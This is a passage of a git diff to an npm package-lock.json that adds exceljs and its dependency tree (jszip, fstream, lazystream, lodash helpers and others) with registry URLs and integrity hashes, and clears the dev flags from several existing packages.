"https://registry.npmjs.org/crc-32/-/crc-32-1.2.2.tgz", + "integrity": "sha512-ROmzCKrTnOwybPcJApAA6WBWij23HVfGVNKqqrZpuyZOHqK2CwHSvpGuyt/UNNvaIjEd8X5IFGp4Mh+Ie1IHJQ==", + "bin": { + "crc32": "bin/crc32.njs" + }, + "engines": { + "node": ">=0.8" + } + }, + "node_modules/crc32-stream": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/crc32-stream/-/crc32-stream-4.0.3.tgz", + "integrity": "sha512-NT7w2JVU7DFroFdYkeq8cywxrgjPHWkdX1wjpRQXPX5Asews3tA+Ght6lddQO5Mkumffp3X7GEqku3epj2toIw==", + "dependencies": { + "crc-32": "^1.2.0", + "readable-stream": "^3.4.0" + }, + "engines": { + "node": ">= 10" + } }, "node_modules/cross-spawn": { "version": "7.0.3", @@ -1620,6 +1537,11 @@ "resolved": "https://registry.npmjs.org/csstype/-/csstype-2.6.21.tgz", "integrity": "sha512-Z1PhmomIfypOpoMjRQB70jfvy/wxT50qW08YXO5lMIJkrdq4yOTR+AW7FqutScmB9NkLwxo+jU+kZLbofZZq/w==" }, + "node_modules/dayjs": { + "version": "1.11.10", + "resolved": "https://registry.npmjs.org/dayjs/-/dayjs-1.11.10.tgz", + "integrity": "sha512-vjAczensTgRcqDERK0SR2XMwsF/tSvnvlv6VcF2GIhg6Sx4yOIt/irsr1RDJsKiIyBzJDpCoXiWWq28MqH2cnQ==" + }, "node_modules/de-indent": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/de-indent/-/de-indent-1.0.2.tgz", @@ -1716,12 +1638,55 @@ "resolved": "https://registry.npmjs.org/downloadjs/-/downloadjs-1.4.7.tgz", "integrity": "sha512-LN1gO7+u9xjU5oEScGFKvXhYf7Y/empUIIEAGBs1LzUq/rg5duiDrkuH5A2lQGd5jfMOb9X9usDa2oVXwJ0U/Q==" }, + "node_modules/duplexer2": { + "version": "0.1.4", + "resolved": "https://registry.npmjs.org/duplexer2/-/duplexer2-0.1.4.tgz", + "integrity": "sha512-asLFVfWWtJ90ZyOUHMqk7/S2w2guQKxUI2itj3d92ADHhxUSbCMGi1f1cBcJ7xM1To+pE/Khbwo1yuNbMEPKeA==", + "dependencies": { + "readable-stream": "^2.0.2" + } + }, + "node_modules/duplexer2/node_modules/readable-stream": { + "version": "2.3.8", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", + "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", + "dependencies": { + "core-util-is": "~1.0.0", + "inherits": "~2.0.3", + "isarray": "~1.0.0", + "process-nextick-args": "~2.0.0", + "safe-buffer": "~5.1.1", + "string_decoder": "~1.1.1", + "util-deprecate": "~1.0.1" + } + }, + "node_modules/duplexer2/node_modules/safe-buffer": { + "version": "5.1.2", + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", + "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" + }, + "node_modules/duplexer2/node_modules/string_decoder": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", + "dependencies": { + "safe-buffer": "~5.1.0" + } + }, "node_modules/electron-to-chromium": { "version": "1.4.284", "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.284.tgz", "integrity": "sha512-M8WEXFuKXMYMVr45fo8mq0wUrrJHheiKZf6BArTKk9ZBYCKJEOU5H8cdWgDT+qCVZf7Na4lVUaZsA+h6uA9+PA==", "dev": true }, + "node_modules/end-of-stream": { + "version": "1.4.4", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.4.tgz", + "integrity": "sha512-+uw1inIHVPQoaVuHzRyXd21icM+cnt4CzD5rW+NC1wjOUSTOs+Te7FOv7AhN7vS9x/oIyhLP5PR1H+phQAHu5Q==", + "dependencies": { + "once": "^1.4.0" + } + }, "node_modules/entities": { "version": "4.5.0", "resolved": "https://registry.npmjs.org/entities/-/entities-4.5.0.tgz", @@ -1987,6 +1952,37 @@ "node": ">=0.10.0" } }, + "node_modules/exceljs": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/exceljs/-/exceljs-4.4.0.tgz", + "integrity": "sha512-XctvKaEMaj1Ii9oDOqbW/6e1gXknSY4g/aLCDicOXqBE4M0nRWkUu0PTp++UPNzoFY12BNHMfs/VadKIS6llvg==", + "dependencies": { + "archiver": "^5.0.0", + "dayjs": "^1.8.34", + "fast-csv": "^4.3.1", + "jszip": "^3.10.1", + "readable-stream": "^3.6.0", + "saxes": "^5.0.1", + "tmp": "^0.2.0", + "unzipper": "^0.10.11", + "uuid": "^8.3.0" + }, + "engines": { + "node": ">=8.3.0" + } + }, + "node_modules/fast-csv": { + "version": "4.3.6", + "resolved": "https://registry.npmjs.org/fast-csv/-/fast-csv-4.3.6.tgz", + "integrity": "sha512-2RNSpuwwsJGP0frGsOmTb9oUF+VkFSM4SyLTDgwf2ciHWTarN0lQTC+F2f/t5J9QjW+c65VFIAAu85GsvMIusw==", + "dependencies": { + "@fast-csv/format": "4.3.5", + "@fast-csv/parse": "4.3.6" + }, + "engines": { + "node": ">=10.0.0" + } + }, "node_modules/fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", @@ -2114,11 +2110,15 @@ "url": "https://www.patreon.com/infusion" } }, + "node_modules/fs-constants": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/fs-constants/-/fs-constants-1.0.0.tgz", + "integrity": "sha512-y6OAwoSIf7FyjMIv94u+b5rdheZEjzR63GTyZJm5qh4Bi+2YgwLCcI/fPFZkL5PSixOt6ZNKm+w+Hfp/Bciwow==" + }, "node_modules/fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true + "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "node_modules/fsevents": { "version": "2.3.2", @@ -2134,6 +2134,31 @@ "node": "^8.16.0 || ^10.6.0 || >=11.0.0" } }, + "node_modules/fstream": { + "version": "1.0.12", + "resolved": "https://registry.npmjs.org/fstream/-/fstream-1.0.12.tgz", + "integrity": "sha512-WvJ193OHa0GHPEL+AycEJgxvBEwyfRkN1vhjca23OaPVMCaLCXTd5qAu82AjTcgP1UJmytkOKb63Ypde7raDIg==", + "dependencies": { + "graceful-fs": "^4.1.2", + "inherits": "~2.0.0", + "mkdirp": ">=0.5 0", + "rimraf": "2" + }, + "engines": { + "node": ">=0.6" + } + }, + "node_modules/fstream/node_modules/rimraf": { + "version": "2.7.1", + "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", + "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", + "dependencies": { + "glob": "^7.1.3" + }, + "bin": { + "rimraf": "bin.js" + } + }, "node_modules/function-bind": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", @@ -2144,7 +2169,6 @@ "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, "dependencies": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", @@ -2207,6 +2231,11 @@ "url": "https://github.com/sponsors/sindresorhus" } }, + "node_modules/graceful-fs": { + "version": "4.2.11", + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==" + }, "node_modules/grapheme-splitter": { "version": "1.0.4", "resolved": "https://registry.npmjs.org/grapheme-splitter/-/grapheme-splitter-1.0.4.tgz", @@ -2249,6 +2278,25 @@ "he": "bin/he" } }, + "node_modules/ieee754": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/ieee754/-/ieee754-1.2.1.tgz", + "integrity": "sha512-dcyqhDvX1C46lXZcVqCpK+FtMRQVdIMN6/Df5js2zouUsqG7I6sFxitIC+7KYK29KdXOLHdu9zL4sFnoVQnqaA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, "node_modules/ignore": { "version": "5.2.4", "resolved": "https://registry.npmjs.org/ignore/-/ignore-5.2.4.tgz", @@ -2258,6 +2306,11 @@ "node": ">= 4" } }, + "node_modules/immediate": { + "version": "3.0.6", + "resolved": "https://registry.npmjs.org/immediate/-/immediate-3.0.6.tgz", + "integrity": "sha512-XXOFtyqDjNDAQxVfYxuF7g9Il/IbWmmlQg2MYKOH8ExIT1qg6xc4zyS3HaEEATgs1btfzxq15ciUiY7gjSXRGQ==" + }, "node_modules/import-fresh": { "version": "3.3.0", "resolved": "https://registry.npmjs.org/import-fresh/-/import-fresh-3.3.0.tgz", @@ -2287,7 +2340,6 @@ "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, "dependencies": { "once": "^1.3.0", "wrappy": "1" @@ -2296,8 +2348,7 @@ "node_modules/inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true + "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "node_modules/is-binary-path": { "version": "2.1.0", @@ -2362,6 +2413,11 @@ "node": ">=8" } }, + "node_modules/isarray": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", + "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" + }, "node_modules/isexe": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", @@ -2401,6 +2457,82 @@ "integrity": "sha512-Bdboy+l7tA3OGW6FjyFHWkP5LuByj1Tk33Ljyq0axyzdk9//JSi2u3fP1QSmd1KNwq6VOKYGlAu87CisVir6Pw==", "dev": true }, + "node_modules/jszip": { + "version": "3.10.1", + "resolved": "https://registry.npmjs.org/jszip/-/jszip-3.10.1.tgz", + "integrity": "sha512-xXDvecyTpGLrqFrvkrUSoxxfJI5AH7U8zxxtVclpsUtMCq4JQ290LY8AW5c7Ggnr/Y/oK+bQMbqK2qmtk3pN4g==", + "dependencies": { + "lie": "~3.3.0", + "pako": "~1.0.2", + "readable-stream": "~2.3.6", + "setimmediate": "^1.0.5" + } + }, + "node_modules/jszip/node_modules/readable-stream": { + "version": "2.3.8", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", + "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", + "dependencies": { + "core-util-is": "~1.0.0", + "inherits": "~2.0.3", + "isarray": "~1.0.0", + "process-nextick-args": "~2.0.0", + "safe-buffer": "~5.1.1", + "string_decoder": "~1.1.1", + "util-deprecate": "~1.0.1" + } + }, + "node_modules/jszip/node_modules/safe-buffer": { + "version": "5.1.2", + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", + "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" + }, + "node_modules/jszip/node_modules/string_decoder": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", + "dependencies": { + "safe-buffer": "~5.1.0" + } + }, + "node_modules/lazystream": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/lazystream/-/lazystream-1.0.1.tgz", + "integrity": "sha512-b94GiNHQNy6JNTrt5w6zNyffMrNkXZb3KTkCZJb2V1xaEGCk093vkZ2jk3tpaeP33/OiXC+WvK9AxUebnf5nbw==", + "dependencies": { + "readable-stream": "^2.0.5" + }, + "engines": { + "node": ">= 0.6.3" + } + }, + "node_modules/lazystream/node_modules/readable-stream": { + "version": "2.3.8", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", + "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", + "dependencies": { + "core-util-is": "~1.0.0", + "inherits": "~2.0.3", + "isarray": "~1.0.0", + "process-nextick-args": "~2.0.0", + "safe-buffer": "~5.1.1", + "string_decoder": "~1.1.1", + "util-deprecate": "~1.0.1" + } + }, + "node_modules/lazystream/node_modules/safe-buffer": { + "version": "5.1.2", + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", + "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" + }, + "node_modules/lazystream/node_modules/string_decoder": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", + "dependencies": { + "safe-buffer": "~5.1.0" + } + }, "node_modules/levn": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/levn/-/levn-0.4.1.tgz", @@ -2414,6 +2546,14 @@ "node": ">= 0.8.0" } }, + "node_modules/lie": { + "version": "3.3.0", + "resolved": "https://registry.npmjs.org/lie/-/lie-3.3.0.tgz", + "integrity": "sha512-UaiMJzeWRlEujzAuw5LokY1L5ecNQYZKfmyZ9L7wDHb/p5etKaxXhohBcrw0EYby+G/NA52vRSN4N39dxHAIwQ==", + "dependencies": { + "immediate": "~3.0.5" + } + }, "node_modules/lilconfig": { "version": "2.0.6", "resolved": "https://registry.npmjs.org/lilconfig/-/lilconfig-2.0.6.tgz", @@ -2423,6 +2563,11 @@ "node": ">=10" } }, + "node_modules/listenercount": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/listenercount/-/listenercount-1.0.1.tgz", + "integrity": "sha512-3mk/Zag0+IJxeDrxSgaDPy4zZ3w05PRZeJNnlWhzFz5OkX49J4krc+A8X2d2M69vGMBEX0uyl8M+W+8gH+kBqQ==" + }, "node_modules/locate-path": { "version": "6.0.0", "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-6.0.0.tgz", @@ -2444,12 +2589,77 @@ "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==", "dev": true }, + "node_modules/lodash.defaults": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/lodash.defaults/-/lodash.defaults-4.2.0.tgz", + "integrity": "sha512-qjxPLHd3r5DnsdGacqOMU6pb/avJzdh9tFX2ymgoZE27BmjXrNy/y4LoaiTeAb+O3gL8AfpJGtqfX/ae2leYYQ==" + }, + "node_modules/lodash.difference": { + "version": "4.5.0", + "resolved": "https://registry.npmjs.org/lodash.difference/-/lodash.difference-4.5.0.tgz", + "integrity": "sha512-dS2j+W26TQ7taQBGN8Lbbq04ssV3emRw4NY58WErlTO29pIqS0HmoT5aJ9+TUQ1N3G+JOZSji4eugsWwGp9yPA==" + }, + "node_modules/lodash.escaperegexp": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/lodash.escaperegexp/-/lodash.escaperegexp-4.1.2.tgz", + "integrity": "sha512-TM9YBvyC84ZxE3rgfefxUWiQKLilstD6k7PTGt6wfbtXF8ixIJLOL3VYyV/z+ZiPLsVxAsKAFVwWlWeb2Y8Yyw==" + }, + "node_modules/lodash.flatten": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/lodash.flatten/-/lodash.flatten-4.4.0.tgz", + "integrity": "sha512-C5N2Z3DgnnKr0LOpv/hKCgKdb7ZZwafIrsesve6lmzvZIRZRGaZ/l6Q8+2W7NaT+ZwO3fFlSCzCzrDCFdJfZ4g==" + }, + "node_modules/lodash.groupby": { + "version": "4.6.0", + "resolved": "https://registry.npmjs.org/lodash.groupby/-/lodash.groupby-4.6.0.tgz", + "integrity": "sha512-5dcWxm23+VAoz+awKmBaiBvzox8+RqMgFhi7UvX9DHZr2HdxHXM/Wrf8cfKpsW37RNrvtPn6hSwNqurSILbmJw==" + }, + "node_modules/lodash.isboolean": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/lodash.isboolean/-/lodash.isboolean-3.0.3.tgz", + "integrity": "sha512-Bz5mupy2SVbPHURB98VAcw+aHh4vRV5IPNhILUCsOzRmsTmSQ17jIuqopAentWoehktxGd9e/hbIXq980/1QJg==" + }, + "node_modules/lodash.isequal": { + "version": "4.5.0", + "resolved": "https://registry.npmjs.org/lodash.isequal/-/lodash.isequal-4.5.0.tgz", + "integrity": "sha512-pDo3lu8Jhfjqls6GkMgpahsF9kCyayhgykjyLMNFTKWrpVdAQtYyB4muAMWozBB4ig/dtWAmsMxLEI8wuz+DYQ==" + }, + "node_modules/lodash.isfunction": { + "version": "3.0.9", + "resolved": "https://registry.npmjs.org/lodash.isfunction/-/lodash.isfunction-3.0.9.tgz", + "integrity": "sha512-AirXNj15uRIMMPihnkInB4i3NHeb4iBtNg9WRWuK2o31S+ePwwNmDPaTL3o7dTJ+VXNZim7rFs4rxN4YU1oUJw==" + }, + "node_modules/lodash.isnil": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/lodash.isnil/-/lodash.isnil-4.0.0.tgz", + "integrity": "sha512-up2Mzq3545mwVnMhTDMdfoG1OurpA/s5t88JmQX809eH3C8491iu2sfKhTfhQtKY78oPNhiaHJUpT/dUDAAtng==" + }, + "node_modules/lodash.isplainobject": { + "version": "4.0.6", + "resolved": "https://registry.npmjs.org/lodash.isplainobject/-/lodash.isplainobject-4.0.6.tgz", + "integrity": "sha512-oSXzaWypCMHkPC3NvBEaPHf0KsA5mvPrOPgQWDsbg8n7orZ290M0BmC/jgRZ4vcJ6DTAhjrsSYgdsW/F+MFOBA==" + }, + "node_modules/lodash.isundefined": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/lodash.isundefined/-/lodash.isundefined-3.0.1.tgz", + "integrity": "sha512-MXB1is3s899/cD8jheYYE2V9qTHwKvt+npCwpD+1Sxm3Q3cECXCiYHjeHWXNwr6Q0SOBPrYUDxendrO6goVTEA==" + }, "node_modules/lodash.merge": { "version": "4.6.2", "resolved": "https://registry.npmjs.org/lodash.merge/-/lodash.merge-4.6.2.tgz", "integrity": "sha512-0KpjqXRVvrYyCsX1swR/XTK0va6VQkQM6MNo7PqW77ByjAhoARA8EfrP1N4+KlKj8YS0ZUCtRT/YUuhyYDujIQ==", "dev": true }, + "node_modules/lodash.union": { + "version": "4.6.0", + "resolved": "https://registry.npmjs.org/lodash.union/-/lodash.union-4.6.0.tgz", + "integrity": "sha512-c4pB2CdGrGdjMKYLA+XiRDO7Y0PRQbm/Gzg8qMj+QH+pFVAoTp5sBpO0odL3FjoPCGjK96p6qsP+yQoiLoOBcw==" + }, + "node_modules/lodash.uniq": { + "version": "4.5.0", + "resolved": "https://registry.npmjs.org/lodash.uniq/-/lodash.uniq-4.5.0.tgz", + "integrity": "sha512-xfBaXQd9ryd9dlSDvnvI0lvxfLJlYAZzXomUYzLKtUeOQvOP5piqAWuGtrhWeqaXK9hhoM/iyJc5AV+XfsX3HQ==" + }, "node_modules/lru-cache": { "version": "6.0.0", "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", @@ -2516,7 +2726,6 @@ "version": "3.1.2", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, "dependencies": { "brace-expansion": "^1.1.7" }, @@ -2528,11 +2737,21 @@ "version": "1.2.7", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.7.tgz", "integrity": "sha512-bzfL1YUZsP41gmu/qjrEk0Q6i2ix/cVeAhbCbqH9u3zYutS1cLg00qhrD0M2MVdCcx4Sc0UpP2eBWo9rotpq6g==", - "dev": true, "funding": { "url": "https://github.com/sponsors/ljharb" } }, + "node_modules/mkdirp": { + "version": "0.5.6", + "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", + "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", + "dependencies": { + "minimist": "^1.2.6" + }, + "bin": { + "mkdirp": "bin/cmd.js" + } + }, "node_modules/ms": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", @@ -2584,7 +2803,6 @@ "version": "3.0.0", "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true, "engines": { "node": ">=0.10.0" } @@ -2693,7 +2911,6 @@ "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, "dependencies": { "wrappy": "1" } @@ -2745,6 +2962,11 @@ "url": "https://github.com/sponsors/sindresorhus" } }, + "node_modules/pako": { + "version": "1.0.11", + "resolved": "https://registry.npmjs.org/pako/-/pako-1.0.11.tgz", + "integrity": "sha512-4hLB8Py4zZce5s4yd9XzopqwVv/yGNhV1Bl8NTmCq1763HeK2+EwVTv+leGeL13Dnh2wfbqowVPXCIO0z4taYw==" + }, "node_modules/parent-module": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/parent-module/-/parent-module-1.0.1.tgz", @@ -2776,7 +2998,6 @@ "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true, "engines": { "node": ">=0.10.0" } @@ -3045,6 +3266,11 @@ "vue": "^3.0.0" } }, + "node_modules/process-nextick-args": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", + "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" + }, "node_modules/punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", @@ -3108,6 +3334,46 @@ "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, + "node_modules/readable-stream": { + "version": "3.6.2", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-3.6.2.tgz", + "integrity": "sha512-9u/sniCrY3D5WdsERHzHE4G2YCXqoG5FTHUiCC4SIbr6XcLZBY05ya9EKjYek9O5xOAwjGq+1JdGBAS7Q9ScoA==", + "dependencies": { + "inherits": "^2.0.3", + "string_decoder": "^1.1.1", + "util-deprecate": "^1.0.1" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/readdir-glob": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/readdir-glob/-/readdir-glob-1.1.3.tgz", + "integrity": "sha512-v05I2k7xN8zXvPD9N+z/uhXPaj0sUFCe2rcWZIpBsqxfP7xXFQ0tipAd/wjj1YxWyWtUS5IDJpOG82JKt2EAVA==", + "dependencies": { + "minimatch": "^5.1.0" + } + }, + "node_modules/readdir-glob/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/readdir-glob/node_modules/minimatch": { + "version": "5.1.6", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", + "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=10" + } + }, "node_modules/readdirp": { "version": "3.6.0", "resolved": "https://registry.npmjs.org/readdirp/-/readdirp-3.6.0.tgz", @@ -3222,6 +3488,36 @@ "queue-microtask": "^1.2.2" } }, + "node_modules/safe-buffer": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", + "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/saxes": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/saxes/-/saxes-5.0.1.tgz", + "integrity": "sha512-5LBh1Tls8c9xgGjw3QrMwETmTMVk0oFgvrFSvWx62llR2hcEInrKNZ2GZCCuuy2lvWrdl5jhbpeqc5hRYKFOcw==", + "dependencies": { + "xmlchars": "^2.2.0" + }, + "engines": { + "node": ">=10" + } + }, "node_modules/semver": { "version": "7.6.0", "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.0.tgz", @@ -3237,6 +3533,11 @@ "node": ">=10" } }, + "node_modules/setimmediate": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/setimmediate/-/setimmediate-1.0.5.tgz", + "integrity": "sha512-MATJdZp8sLqDl/68LfQmbP8zKPLQNV6BIZoIgrscFDQ+RsvK/BxeDQOgyxKKoh0y/8h3BqVFnCqQ/gd+reiIXA==" + }, "node_modules/shebang-command": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", @@ -3298,6 +3599,14 @@ "integrity": "sha512-9NykojV5Uih4lgo5So5dtw+f0JgJX30KCNI8gwhz2J9A15wD0Ml6tjHKwf6fTSa6fAdVBdZeNOs9eJ71qCk8vA==", "deprecated": "Please use @jridgewell/sourcemap-codec instead" }, + "node_modules/string_decoder": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.3.0.tgz", + "integrity": "sha512-hkRX8U1WjJFd8LsDJ2yQ/wWWxaopEsABU1XfkM8A+j0+85JAGppt16cr1Whg6KIbb4okU6Mql6BOj+uup/wKeA==", + "dependencies": { + "safe-buffer": "~5.2.0" + } + }, "node_modules/strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", @@ -3387,12 +3696,35 @@ "postcss": "^8.0.9" } }, + "node_modules/tar-stream": { + "version": "2.2.0", + "resolved": 